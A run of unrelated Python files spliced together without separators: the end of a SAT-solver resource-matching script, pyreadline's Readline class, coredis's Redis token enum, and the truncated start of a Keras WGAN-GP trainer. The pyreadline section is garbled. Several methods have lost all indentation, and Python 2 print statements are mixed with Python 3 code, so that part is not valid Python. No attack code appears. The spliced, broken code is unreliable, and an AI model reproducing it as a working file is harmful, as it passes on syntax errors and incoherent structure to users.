    everything after it unreachable. The dead code documents the intended
    logic: allow cross-site pairs (assumed internet link), otherwise search
    n1's endpoints for a request link whose other endpoint belongs to n2.
    """
    #print 'checking', n1['props']['name'], n2['props']['name'], link_props
    # Find the link, or allow if they are on different groups, assuming an internet link
    # If they are on the same site, assume there's a switch. Otherwise assume a slow internet link
    return True
    # --- unreachable below: kept as the intended implementation sketch ---
    if node_site_map[n1['id']] != node_site_map[n2['id']]:
        #print ' link ok, they are on different sites'
        return True
    link = None
    for ep in n1['endpoints']:
        if ep['id'] not in id_link_map:
            #print 'end point not linked:', ep['id']
            continue
        req_link = id_link_map[ep['id']]
        # The request link's endpoint that is not ep itself
        other_ep = [epo['id'] for epo in req_link['endpoints'] if epo['id'] != ep['id']][0]
        if other_ep in [ep2['id'] for ep2 in n2['endpoints']]:
            #print ' link is', req_link
            link = req_link
            break
    if link is None:
        #print ' no link'
        return False
    return True
# Convenience. Return the variable that says this query node is matched to this resource node in the solution.
def match_var(query_node, resource_node):
    """Return the SAT variable number for 'query_node matched to resource_node'."""
    var_number, _found = find_or_add_var(query_node['id'], resource_node['id'], '_matched_to_')
    return var_number
# Return the variable that says this path should have this value. Create it if necessary.
def find_or_add_var(path, value, relation="="):
    """Return (variable_number, already_existed) for the named SAT variable.

    Variable numbers are assigned sequentially starting at 1, as pycosat requires.
    """
    global var_map, num_to_var
    var_name = path + relation + str(value)
    existed = var_name in var_map
    if not existed:
        number = len(var_map) + 1
        var_map[var_name] = number
        num_to_var[number] = var_name
    return var_map[var_name], existed
# Functions that help manipulate sets of solutions.
def count_solutions(request, resources):
    """Count the satisfying assignments of the SAT encoding of *request*.

    Fix: the previous implementation called the Python-2-only iterator method
    ``.next()`` inside a bare ``except``, so under Python 3 the resulting
    AttributeError was swallowed and the function always reported 0. It also
    shadowed the builtin ``iter``. May take time: pycosat enumerates every
    solution.
    """
    clauses = generate_clauses(request, resources)
    return sum(1 for _ in pycosat.itersolve(clauses))
# Assuming there is a solution using this set of resources, is there a solution with a smaller set?
# Inefficient to constantly re-generate the clauses, but tolerable for small resource counts.
def sub_enclave_solution(request, resources):
    """Return (names, solution) pairs for every leave-one-out subset that still solves."""
    sub_solutions = []
    for excluded in resources:
        remaining = list(resources)
        remaining.remove(excluded)
        names, solution = solve(request, remaining)
        if solution is not None:
            #print 'found a sub-enclave solution leaving out', res
            print("found a sub-enclave solution leaving out %s " % excluded)
            sub_solutions.append((names, solution))
    return sub_solutions
# Take a list of enclaves and produce the list of property values for each property found for nodes.
# Endpoint properties are collected separately under the 'endpoints' key. Will generalize.
def gather_properties(enclaves):
    """Collect the sets of observed property values across all enclave nodes."""
    collected = dict()
    collected['endpoints'] = dict()
    for enclave in enclaves:
        for node in enclave['nodes']:
            if 'props' in node:
                add_to_properties(node['props'], collected)
            for endpoint in node.get('endpoints', ()):
                if 'props' in endpoint:
                    add_to_properties(endpoint['props'], collected['endpoints'])
    return collected
def add_to_properties(data, val_dict, indent=0):
    """Accumulate the property values in *data* into *val_dict* (sets of values,
    nested dicts recursed into). 'name' and 'nic' are skipped.

    Fix: ``isinstance(val, collections.Hashable)`` relied on an alias that was
    removed in Python 3.10; replaced by an EAFP try/except that skips
    unhashable entries exactly as before.
    """
    for prop in data:
        if prop == 'nic' or prop == 'name': # Remove these for now, though we could help a user address specific resources
            continue
        node_value = data[prop]
        # Replace {'value__': X, 'constraint__': '='} with X. Resources are not expected to carry other constraint kinds.
        if type(node_value) is dict and 'value__' in node_value and 'constraint__' in node_value and node_value['constraint__'] == '=':
            node_value = node_value['value__']
        if type(node_value) is list:
            values = val_dict.setdefault(prop, set())
            for val in node_value:
                try:  # Should recursively add values; unhashable entries are skipped
                    values.add(val)
                except TypeError:
                    pass
        elif type(node_value) is dict: # Should recursively add values
            add_to_properties(node_value, val_dict.setdefault(prop, dict()), indent + 2)
        else:
            val_dict.setdefault(prop, set()).add(node_value)
# To help look at this output, remove the long id names.
# Global map from long resource/nic id strings to small integers, shared by
# short_ids/rec_shorten_ids below; grows monotonically, display use only.
ids = dict()
def short_ids(orig_site):
    """Return a deep copy of *orig_site* with long id strings replaced by short ints."""
    shortened = copy.deepcopy(orig_site)
    rec_shorten_ids(shortened)
    return shortened
def rec_shorten_ids(d):
    """Recursively replace 'id'/'nic' values in *d* with short numeric aliases.

    Aliases come from the module-level ``ids`` map, assigned in discovery order.
    """
    for key in d:
        value = d[key]
        if key in ['id', 'nic']:
            # setdefault assigns the next sequential alias on first sight
            d[key] = ids.setdefault(value, len(ids))
        elif isinstance(value, dict):
            rec_shorten_ids(value)
        elif isinstance(value, list):
            for element in value:
                if isinstance(element, dict):
                    rec_shorten_ids(element)
def trySubsets(request, resources):
    """Try to solve *request* on every proper subset of *resources*.

    Prints each index combination and whether it has a solution, then the
    accumulated result list. Returns None (results are print-only).

    Cleanups: ``names != None`` -> ``is not None``; manual append loops
    replaced with comprehensions; printed output is unchanged.
    """
    index_set = set(range(len(resources)))
    combos = set()
    for size in range(1, len(resources)):
        combos.update(itertools.combinations(index_set, size))
    solutions = []
    for combo in combos:
        subset = [resources[i] for i in combo]
        names, solution = solve(request, subset)
        print(list(combo))
        combo_result = {'site_combo': list(combo)}
        if names is not None:
            print("Has solution:")
            print(names)
            combo_result['solution'] = True
        else:
            print("Has no solution")
            combo_result['solution'] = False
        solutions.append(combo_result)
    print(solutions)
if __name__ == "__main__":
    # Import json resources for the example sites
    #root = "/Users/jim/repo/Projects/Bridge/CEF/git/xir/examples/"
    root = ""
    with open(root + "sites/emu.json") as f:
        emu_json = json.load(f)
    with open(root + "sites/cellular.json") as f:
        cellular_json = json.load(f)
    with open(root + "sites/iot.json") as f:
        iot_json = json.load(f)
    #with open(root + "experiments/small-world.json") as f:
    #    small_world_json = json.load(f)
    with open(root + "experiments/test.json") as f:
        small_world_json = json.load(f)
    resources = [emu_json, cellular_json, iot_json]
    # Gather the value ranges the resources offer (result currently unused)
    r = gather_properties(resources)
    #print(r['image'])
    #exit()
    trySubsets(small_world_json, resources)
    exit()
    # NOTE(review): everything below is unreachable because of the exit() above —
    # kept as a scratch driver for the full solve / sub-enclave workflow.
    # Solve the problem and look for solutions with fewer enclaves
    print(small_world_json)
    print(resources)
    names, solution = solve(small_world_json, resources)
    print("Names: ")
    print(names)
    print("Solutions ")
    print(solution)
    #print '\n** Seeking solutions with fewer groups of resources'
    print("\n** Seeking solutions with fewer groups of resources")
    sub_solutions = sub_enclave_solution(small_world_json, resources)
    # Create ranges of possible values for features of requested nodes and networks based on the resources
    ranges = gather_properties(resources)
    # To count the number of solutions call count_solutions (may take time, not yet smart about combinatorics)
# -*- coding: utf-8 -*-
# *****************************************************************************
# Copyright (C) 2003-2006 <NAME>.
# Copyright (C) 2006 <NAME>. <<EMAIL>>
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
# *****************************************************************************
''' an attempt to implement readline for Python in Python using ctypes'''
import os
import pyreadline.lineeditor.history as history
import pyreadline.lineeditor.lineobj as lineobj
import re
import sys
from pyreadline.keysyms.common import make_KeyPress_from_keydescr
import console
import logger
import release
from error import ReadlineError, GetSetError
from logger import log, log_sock
from modes import editingmodes
# IronPython hosting is detected from the interpreter version string; under
# IronPython the console does not hand the prompt string to readline, so we
# emulate the standard ">>> " prompt ourselves.
in_ironpython = "IronPython" in sys.version
if in_ironpython: # ironpython does not provide a prompt string to readline
    import System
    default_prompt = ">>> "
else:
    default_prompt = ""
def quote_char(c):
    """Return *c* unchanged, or None when it is the NUL character."""
    if ord(c) == 0:
        return None
    return c
def inword(buffer, point):
    """Return True if the character at *point* in *buffer* is ASCII alphanumeric.

    Fix: the original body ``buffer[point:point + 1] in [A - Za - z0 - 9]`` was
    a garbled character class (undefined names A, Za, z0) and raised NameError
    whenever called; the intended [A-Za-z0-9] test is done with a regex.
    An out-of-range *point* yields an empty slice and returns False.
    """
    return bool(re.match(r"[A-Za-z0-9]", buffer[point:point + 1]))
class Readline(object):
    def __init__(self):
        """Initialize console state, key bindings and history.

        Order matters: the editing modes read self.l_buffer and self._history,
        and read_inputrc may rebind keys on the constructed modes.
        """
        self.startup_hook = None
        self.pre_input_hook = None
        self.completer = None
        # Characters that terminate a completion word
        self.completer_delims = " \t\n\"\\'`@$><=;|&{("
        self.console = console.Console()
        self.size = self.console.size()
        self.prompt_color = None
        self.command_color = None
        # Selection shown by swapping fg into bg attribute bits
        self.selection_color = self.console.saveattr << 4
        self.key_dispatch = {}
        self.previous_func = None
        self.first_prompt = True
        self.next_meta = False # True to force meta on next character
        self.tabstop = 4
        self.allow_ctrl_c = False
        # Max seconds between two Ctrl-C taps treated as one interrupt
        self.ctrl_c_tap_time_interval = 0.3
        self.debug = False
        # Tab-completion scope indices reported via get_begidx/get_endidx
        self.begidx = 0
        self.endidx = 0
        # variables you can control with parse_and_bind
        self.show_all_if_ambiguous = 'off'
        self.mark_directories = 'on'
        self.bell_style = 'none'
        self.mark = -1
        self.l_buffer = lineobj.ReadLineTextBuffer("")
        self._history = history.LineHistory()
        # this code needs to follow l_buffer and history creation
        self.editingmodes = [mode(self) for mode in editingmodes]
        for mode in self.editingmodes:
            mode.init_editing_mode(None)
        # First listed editing mode (emacs by convention) is the default
        self.mode = self.editingmodes[0]
        self.read_inputrc()
        log("\n".join(self.rl_settings_to_string()))
        # Paste settings
        # assumes data on clipboard is path if shorter than 300 characters and doesn't contain \t or \n
        # and replace \ with / for easier use in ipython
        self.enable_ipython_paste_for_paths = True
        # automatically convert tabseparated data to list of lists or array constructors
        self.enable_ipython_paste_list_of_lists = True
        self.enable_win32_clipboard = True
        self.paste_line_buffer = []
    # Below is for refactoring: the attributes listed here were moved into
    # l_buffer / _history; any remaining old-style access raises immediately.
    def _g(x):
        # Factory returning an always-raising (getter, setter) pair for the
        # retired attribute named x, so stale code fails loudly.
        def g(self):
            raise GetSetError("GET %s" % x)
        def s(self, q):
            raise GetSetError("SET %s" % x)
        return g, s
    line_buffer = property(*_g("line_buffer"))
    # NOTE(review): label says "line_buffer" — likely meant "line_cursor";
    # only the error message is affected.
    line_cursor = property(*_g("line_buffer"))
    undo_stack = property(*_g("undo_stack")) # each entry is a tuple with cursor_position and line_text
    history_length = property(*_g("history_length"))
    history = property(*_g("history"))
    history_cursor = property(*_g("history_cursor"))
# To export as readline interface
def parse_and_bind(self, string):
'''Parse and execute single line of a readline init file.'''
try:
log('parse_and_bind("%s")' % string)
if string.startswith('#'):
return
if string.startswith('set'):
m = re.compile(r'set\s+([-a-zA-Z0-9]+)\s+(.+)\s*$').match(string)
if m:
var_name = m.group(1)
val = m.group(2)
try:
setattr(self, var_name.replace('-', '_'), val)
except AttributeError:
log('unknown var="%s" val="%s"' % (var_name, val))
else:
log('bad set "%s"' % string)
return
m = re.compile(r'\s*(.+)\s*:\s*([-a-zA-Z]+)\s*$').match(string)
if m:
key = m.group(1)
func_name = m.group(2)
py_name = func_name.replace('-', '_')
try:
func = getattr(self.mode, py_name)
except AttributeError:
log('unknown func key="%s" func="%s"' % (key, func_name))
if self.debug:
print 'pyreadline parse_and_bind error, unknown function to bind: "%s"' % func_name
return
self.mode._bind_key(key, func)
except:
log('error')
raise
    def get_line_buffer(self):
        '''Return the current contents of the line buffer.'''
        return self.l_buffer.get_line_text()
    def insert_text(self, string):
        '''Insert text into the command line at the current point.'''
        self.l_buffer.insert_text(string)
    def read_init_file(self, filename=None):
        '''Parse a readline initialization file. The default filename is the last filename used.'''
        # NOTE(review): only logs the call — init-file reading is not implemented here.
        log('read_init_file("%s")' % filename)
    # History file book keeping methods (non-bindable).
    # All of these delegate straight to the LineHistory instance in self._history.
    def add_history(self, line):
        '''Append a line to the history buffer, as if it was the last line typed.'''
        self._history.add_history(line)
    def get_history_length(self):
        '''Return the desired length of the history file.
        Negative values imply unlimited history file size.'''
        return self._history.get_history_length()
    def set_history_length(self, length):
        '''Set the number of lines to save in the history file.
        write_history_file() uses this value to truncate the history file
        when saving. Negative values imply unlimited history file size.
        '''
        self._history.set_history_length(length)
    def clear_history(self):
        '''Clear readline history.'''
        self._history.clear_history()
    def read_history_file(self, filename=None):
        '''Load a readline history file. The default filename is ~/.history.'''
        self._history.read_history_file(filename)
    def write_history_file(self, filename=None):
        '''Save a readline history file. The default filename is ~/.history.'''
        self._history.write_history_file(filename)
    # Completer functions — state used by the tab-completion machinery in the
    # editing modes; begidx/endidx are maintained elsewhere and only read here.
    def set_completer(self, function=None):
        '''Set or remove the completer function.
        If function is specified, it will be used as the new completer
        function; if omitted or None, any completer function already
        installed is removed. The completer function is called as
        function(text, state), for state in 0, 1, 2, ..., until it returns a
        non-string value. It should return the next possible completion
        starting with text.
        '''
        log('set_completer')
        self.completer = function
    def get_completer(self):
        '''Get the completer function, or None if none is installed.
        '''
        log('get_completer')
        return self.completer
    def get_begidx(self):
        '''Get the beginning index of the readline tab-completion scope.'''
        return self.begidx
    def get_endidx(self):
        '''Get the ending index of the readline tab-completion scope.'''
        return self.endidx
    def set_completer_delims(self, string):
        '''Set the readline word delimiters for tab-completion.'''
        self.completer_delims = string
    def get_completer_delims(self):
        '''Get the readline word delimiters for tab-completion.'''
        return self.completer_delims
    def set_startup_hook(self, function=None):
        '''Set or remove the startup_hook function.
        If function is specified, it will be used as the new startup_hook
        function; if omitted or None, any hook function already installed is
        removed. The startup_hook function is called with no arguments just
        before readline prints the first prompt.
        '''
        self.startup_hook = function
    def set_pre_input_hook(self, function=None):
        '''Set or remove the pre_input_hook function.
        If function is specified, it will be used as the new pre_input_hook
        function; if omitted or None, any hook function already installed is
        removed. The pre_input_hook function is called with no arguments
        after the first prompt has been printed and just before readline
        starts reading input characters.
        '''
        self.pre_input_hook = function
## Internal functions
def rl_settings_to_string(self):
out = ["%-20s: %s" % ("show all if ambigous", self.show_all_if_ambiguous)]
out.append("%-20s: %s" % ("mark_directories", self.mark_directories))
out.append("%-20s: %s" % ("bell_style", self.bell_style))
out.append("%-20s: %s" % ("mark_directories", self.mark_directories))
out.append("------------- key bindings ------------")
tablepat = "%-7s %-7s %-7s %-15s %-15s "
out.append(tablepat % ("Control", "Meta", "Shift", "Keycode/char", "Function"))
bindings = [(k[0], k[1], k[2], k[3], v.__name__) for k, v in self.mode.key_dispatch.iteritems()]
bindings.sort()
for key in bindings:
out.append(tablepat % (key))
return out
def _bell(self):
'''ring the bell if requested.'''
if self.bell_style == 'none':
pass
elif self.bell_style == 'visible':
raise NotImplementedError("Bellstyle visible is not implemented yet.")
elif self.bell_style == 'audible':
self.console.bell()
else:
raise ReadlineError("Bellstyle %s unknown." % self.bell_style)
def _clear_after(self):
c = self.console
x, y = c.pos()
w, h = c.size()
c.rectangle((x, y, w + 1, y + 1))
c.rectangle((0, y + 1, w, min(y + 3, h)))
def _set_cursor(self):
c = self.console
xc, yc = self.prompt_end_pos
w, h = c.size()
xc += self.l_buffer.visible_line_width()
while (xc >= w):
xc -= w
yc += 1
c.pos(xc, yc)
def _print_prompt(self):
c = self.console
x, y = c.pos()
n = c.write_scrolling(self.prompt, self.prompt_color)
self.prompt_begin_pos = (x, y - n)
self.prompt_end_pos = c.pos()
self.size = c.size()
def _update_prompt_pos(self, n):
if n != 0:
bx, by = self.prompt_begin_pos
ex, ey = self.prompt_end_pos
self.prompt_begin_pos = (bx, by - n)
self.prompt_end_pos = (ex, ey - n)
    def _update_line(self):
        '''Redraw the edited line after the prompt, highlighting any selection,
        scrolling the window if the text reaches the bottom row.'''
        c = self.console
        c.cursor(0) # Hide cursor avoiding flicking
        c.pos(*self.prompt_end_pos)
        ltext = self.l_buffer.quoted_text()
        if self.l_buffer.enable_selection and self.l_buffer.selection_mark >= 0:
            # Selection bounds measured in quoted-text columns, normalized so start <= stop
            start = len(self.l_buffer[:self.l_buffer.selection_mark].quoted_text())
            stop = len(self.l_buffer[:self.l_buffer.point].quoted_text())
            if start > stop:
                stop, start = start, stop
            # n keeps only the last write's scroll count; earlier values are overwritten
            n = c.write_scrolling(ltext[:start], self.command_color)
            n = c.write_scrolling(ltext[start:stop], self.selection_color)
            n = c.write_scrolling(ltext[stop:], self.command_color)
        else:
            n = c.write_scrolling(ltext, self.command_color)
        x, y = c.pos() # Preserve one line for Asian IME(Input Method Editor) statusbar
        w, h = c.size()
        if y >= h - 1 or n > 0:
            c.scroll_window(-1)
            c.scroll((0, 0, w, h), 0, -1)
            n += 1
        self._update_prompt_pos(n)
        if hasattr(c, "clear_to_end_of_window"): # Work around function for ironpython due
            c.clear_to_end_of_window() # to System.Console's lack of FillFunction
        else:
            self._clear_after()
        c.cursor(1) # Show cursor
        self._set_cursor()
def readline(self, prompt=''):
return self.mode.readline(prompt)
def read_inputrc(self, inputrcpath=os.path.expanduser("~/pyreadlineconfig.ini")):
modes = dict([(x.mode, x) for x in self.editingmodes])
mode = self.editingmodes[0].mode
def setmode(name):
self.mode = modes[name]
def bind_key(key, name):
log("bind %s %s" % (key, name))
if hasattr(modes[mode], name):
modes[mode]._bind_key(key, getattr(modes[mode], name))
else:
print "Trying to bind unknown command '%s' | |
<filename>coredis/tokens.py
from __future__ import annotations
from coredis._utils import CaseAndEncodingInsensitiveEnum
class PureToken(CaseAndEncodingInsensitiveEnum):
"""
Enum for using pure-tokens with the redis api.
"""
#: Used by:
#:
#: - ``ACL LOG``
RESET = b"RESET"
#: Used by:
#:
#: - ``BGSAVE``
SCHEDULE = b"SCHEDULE"
#: Used by:
#:
#: - ``BITCOUNT``
#: - ``BITPOS``
BIT = b"BIT"
#: Used by:
#:
#: - ``BITCOUNT``
#: - ``BITPOS``
BYTE = b"BYTE"
#: Used by:
#:
#: - ``BITFIELD``
FAIL = b"FAIL"
#: Used by:
#:
#: - ``BITFIELD``
SAT = b"SAT"
#: Used by:
#:
#: - ``BITFIELD``
WRAP = b"WRAP"
#: Used by:
#:
#: - ``BLMOVE``
#: - ``BLMPOP``
#: - ``LMOVE``
#: - ``LMPOP``
LEFT = b"LEFT"
#: Used by:
#:
#: - ``BLMOVE``
#: - ``BLMPOP``
#: - ``LMOVE``
#: - ``LMPOP``
RIGHT = b"RIGHT"
#: Used by:
#:
#: - ``BZMPOP``
#: - ``ZINTER``
#: - ``ZINTERSTORE``
#: - ``ZMPOP``
#: - ``ZUNION``
#: - ``ZUNIONSTORE``
MAX = b"MAX"
#: Used by:
#:
#: - ``BZMPOP``
#: - ``ZINTER``
#: - ``ZINTERSTORE``
#: - ``ZMPOP``
#: - ``ZUNION``
#: - ``ZUNIONSTORE``
MIN = b"MIN"
#: Used by:
#:
#: - ``CLIENT CACHING``
#: - ``SCRIPT DEBUG``
NO = b"NO"
#: Used by:
#:
#: - ``CLIENT CACHING``
#: - ``SCRIPT DEBUG``
YES = b"YES"
#: Used by:
#:
#: - ``CLIENT KILL``
#: - ``CLIENT LIST``
MASTER = b"MASTER"
#: Used by:
#:
#: - ``CLIENT KILL``
#: - ``CLIENT LIST``
NORMAL = b"NORMAL"
#: Used by:
#:
#: - ``CLIENT KILL``
#: - ``CLIENT LIST``
PUBSUB = b"PUBSUB"
#: Used by:
#:
#: - ``CLIENT KILL``
#: - ``CLIENT LIST``
REPLICA = b"REPLICA"
#: Used by:
#:
#: - ``CLIENT KILL``
SLAVE = b"SLAVE"
#: Used by:
#:
#: - ``CLIENT NO-EVICT``
#: - ``CLIENT REPLY``
#: - ``CLIENT TRACKING``
OFF = b"OFF"
#: Used by:
#:
#: - ``CLIENT NO-EVICT``
#: - ``CLIENT REPLY``
#: - ``CLIENT TRACKING``
ON = b"ON"
#: Used by:
#:
#: - ``CLIENT PAUSE``
ALL = b"ALL"
#: Used by:
#:
#: - ``CLIENT PAUSE``
WRITE = b"WRITE"
#: Used by:
#:
#: - ``CLIENT REPLY``
SKIP = b"SKIP"
#: Used by:
#:
#: - ``CLIENT TRACKING``
BCAST = b"BCAST"
#: Used by:
#:
#: - ``CLIENT TRACKING``
NOLOOP = b"NOLOOP"
#: Used by:
#:
#: - ``CLIENT TRACKING``
OPTIN = b"OPTIN"
#: Used by:
#:
#: - ``CLIENT TRACKING``
OPTOUT = b"OPTOUT"
#: Used by:
#:
#: - ``CLIENT UNBLOCK``
ERROR = b"ERROR"
#: Used by:
#:
#: - ``CLIENT UNBLOCK``
TIMEOUT = b"TIMEOUT"
#: Used by:
#:
#: - ``CLUSTER FAILOVER``
#: - ``FAILOVER``
#: - ``SHUTDOWN``
#: - ``XCLAIM``
FORCE = b"FORCE"
#: Used by:
#:
#: - ``CLUSTER FAILOVER``
TAKEOVER = b"TAKEOVER"
#: Used by:
#:
#: - ``CLUSTER RESET``
HARD = b"HARD"
#: Used by:
#:
#: - ``CLUSTER RESET``
SOFT = b"SOFT"
#: Used by:
#:
#: - ``CLUSTER SETSLOT``
STABLE = b"STABLE"
#: Used by:
#:
#: - ``COPY``
#: - ``FUNCTION LOAD``
#: - ``FUNCTION RESTORE``
#: - ``MIGRATE``
#: - ``RESTORE``
REPLACE = b"REPLACE"
#: Used by:
#:
#: - ``EXPIRE``
#: - ``EXPIREAT``
#: - ``PEXPIRE``
#: - ``PEXPIREAT``
#: - ``ZADD``
GT = b"GT"
#: Used by:
#:
#: - ``EXPIRE``
#: - ``EXPIREAT``
#: - ``PEXPIRE``
#: - ``PEXPIREAT``
#: - ``ZADD``
LT = b"LT"
#: Used by:
#:
#: - ``EXPIRE``
#: - ``EXPIREAT``
#: - ``GEOADD``
#: - ``PEXPIRE``
#: - ``PEXPIREAT``
#: - ``SET``
#: - ``ZADD``
NX = b"NX"
#: Used by:
#:
#: - ``EXPIRE``
#: - ``EXPIREAT``
#: - ``GEOADD``
#: - ``PEXPIRE``
#: - ``PEXPIREAT``
#: - ``SET``
#: - ``ZADD``
XX = b"XX"
#: Used by:
#:
#: - ``FAILOVER``
#: - ``SHUTDOWN``
ABORT = b"ABORT"
#: Used by:
#:
#: - ``FLUSHALL``
#: - ``FLUSHDB``
#: - ``FUNCTION FLUSH``
#: - ``SCRIPT FLUSH``
ASYNC = b"ASYNC"
#: Used by:
#:
#: - ``FLUSHALL``
#: - ``FLUSHDB``
#: - ``FUNCTION FLUSH``
#: - ``SCRIPT DEBUG``
#: - ``SCRIPT FLUSH``
SYNC = b"SYNC"
#: Used by:
#:
#: - ``FUNCTION LIST``
WITHCODE = b"WITHCODE"
#: Used by:
#:
#: - ``FUNCTION RESTORE``
APPEND = b"APPEND"
#: Used by:
#:
#: - ``FUNCTION RESTORE``
FLUSH = b"FLUSH"
#: Used by:
#:
#: - ``GEOADD``
#: - ``ZADD``
CHANGE = b"CH"
#: Used by:
#:
#: - ``GEODIST``
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
#: - ``GEOSEARCHSTORE``
FT = b"FT"
#: Used by:
#:
#: - ``GEODIST``
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
#: - ``GEOSEARCHSTORE``
KM = b"KM"
#: Used by:
#:
#: - ``GEODIST``
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
#: - ``GEOSEARCHSTORE``
M = b"M"
#: Used by:
#:
#: - ``GEODIST``
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
#: - ``GEOSEARCHSTORE``
MI = b"MI"
#: Used by:
#:
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
#: - ``GEOSEARCHSTORE``
ANY = b"ANY"
#: Used by:
#:
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
#: - ``GEOSEARCHSTORE``
#: - ``SORT``
#: - ``SORT_RO``
ASC = b"ASC"
#: Used by:
#:
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
#: - ``GEOSEARCHSTORE``
#: - ``SORT``
#: - ``SORT_RO``
DESC = b"DESC"
#: Used by:
#:
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
WITHCOORD = b"WITHCOORD"
#: Used by:
#:
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
WITHDIST = b"WITHDIST"
#: Used by:
#:
#: - ``GEORADIUS``
#: - ``GEORADIUSBYMEMBER``
#: - ``GEORADIUSBYMEMBER_RO``
#: - ``GEORADIUS_RO``
#: - ``GEOSEARCH``
WITHHASH = b"WITHHASH"
#: Used by:
#:
#: - ``GEOSEARCHSTORE``
STOREDIST = b"STOREDIST"
#: Used by:
#:
#: - ``GETEX``
PERSIST = b"PERSIST"
#: Used by:
#:
#: - ``HRANDFIELD``
WITHVALUES = b"WITHVALUES"
#: Used by:
#:
#: - ``LCS``
IDX = b"IDX"
#: Used by:
#:
#: - ``LCS``
LEN = b"LEN"
#: Used by:
#:
#: - ``LCS``
WITHMATCHLEN = b"WITHMATCHLEN"
#: Used by:
#:
#: - ``LINSERT``
AFTER = b"AFTER"
#: Used by:
#:
#: - ``LINSERT``
BEFORE = b"BEFORE"
#: Used by:
#:
#: - ``MIGRATE``
COPY = b"COPY"
#: Used by:
#:
#: - ``MIGRATE``
EMPTY_STRING = b""
#: Used by:
#:
#: - ``RESTORE``
ABSTTL = b"ABSTTL"
#: Used by:
#:
#: - ``SET``
GET = b"GET"
#: Used by:
#:
#: - ``SET``
KEEPTTL = b"KEEPTTL"
#: Used by:
#:
#: - ``SHUTDOWN``
NOSAVE = b"NOSAVE"
#: Used by:
#:
#: - ``SHUTDOWN``
NOW = b"NOW"
#: Used by:
#:
#: - ``SHUTDOWN``
SAVE = b"SAVE"
#: Used by:
#:
#: - ``SORT``
#: - ``SORT_RO``
SORTING = b"ALPHA"
#: Used by:
#:
#: - ``XADD``
#: - ``XTRIM``
APPROXIMATELY = b"~"
#: Used by:
#:
#: - ``XADD``
AUTO_ID = b"*"
#: Used by:
#:
#: - ``XADD``
#: - ``XTRIM``
EQUAL = b"="
#: Used by:
#:
#: - ``XADD``
#: - ``XTRIM``
MAXLEN = b"MAXLEN"
#: Used by:
#:
#: - ``XADD``
#: - ``XTRIM``
MINID = b"MINID"
#: Used by:
#:
#: - ``XADD``
NOMKSTREAM = b"NOMKSTREAM"
#: Used by:
#:
#: - ``XAUTOCLAIM``
#: - ``XCLAIM``
JUSTID = b"JUSTID"
#: Used by:
#:
#: - ``XGROUP CREATE``
MKSTREAM = b"MKSTREAM"
#: Used by:
#:
#: - ``XGROUP CREATE``
#: - ``XGROUP SETID``
NEW_ID = b"$"
#: Used by:
#:
#: - ``XREADGROUP``
NOACK = b"NOACK"
#: Used by:
#:
#: - ``ZADD``
| |
import json
import os
import numpy as np
from keras.optimizers import RMSprop, Optimizer
from keras.models import Model
from keras.layers import Input, Dense
from keras.initializers import RandomNormal
from keras.utils import plot_model
from keras.layers import Layer
import keras.backend as K
from PIL import Image
from cv2 import cv2 as cv
import random
import time
from colorama import Fore
from functools import partial
from typing import Union
from collections import deque
from statistics import mean
import imagesize
from multiprocessing.pool import ThreadPool
from ..utils.batch_maker import BatchMaker
from ..models import discriminator_models_spreadsheet, generator_models_spreadsheet
from ..keras_extensions.custom_tensorboard import TensorBoardCustom
from ..utils.helpers import time_to_format, get_paths_of_files_from_path
from ..keras_extensions.custom_losses import wasserstein_loss, gradient_penalty_loss
# Weighted average layer used to build the WGAN-GP gradient-penalty samples.
class RandomWeightedAverage(Layer):
    """Keras layer producing a per-sample random convex combination of two batches."""
    def __init__(self, batch_size:int):
        super().__init__()
        # Fixes the first dimension of the random weight tensor
        self.batch_size = batch_size
    # Provides a (random) weighted average between real and generated image samples
    def call(self, inputs, **kwargs):
        # Weights of shape (batch, 1, 1, 1) broadcast over the image dimensions.
        # NOTE(review): assumes exactly two 4-D inputs ordered [real, generated]
        # with leading dimension == batch_size — confirm at the call site.
        weights = K.random_uniform((self.batch_size, 1, 1, 1))
        return (weights * inputs[0]) + ((1 - weights) * inputs[1])
    def compute_output_shape(self, input_shape):
        # Output shape matches the first input's shape
        return input_shape[0]
class WGANGC:
AGREGATE_STAT_INTERVAL = 1_000 # Interval of saving data
RESET_SEEDS_INTERVAL = 5_000 # Interval of reseting seeds for random generators
CHECKPOINT_SAVE_INTERVAL = 500 # Interval of saving checkpoint
    def __init__(self, dataset_path:str,
                 gen_mod_name:str, critic_mod_name:str,
                 latent_dim:int,
                 training_progress_save_path:str,
                 generator_optimizer:Optimizer=RMSprop(0.00005), critic_optimizer:Optimizer=RMSprop(0.00005),
                 batch_size:int=32, buffered_batches:int=20,
                 generator_weights:Union[str, None]=None, critic_weights:Union[str, None]=None,
                 critic_gradient_penalty_weight:float=10,
                 start_episode:int=0, load_from_checkpoint:bool=False,
                 check_dataset:bool=True, num_of_loading_workers:int=8):
        """Build the full WGAN-GP training graph: generator, critic, and the two
        combined (frozen-counterpart) models, plus progress/checkpoint state.

        Args:
            dataset_path: directory scanned for training image files.
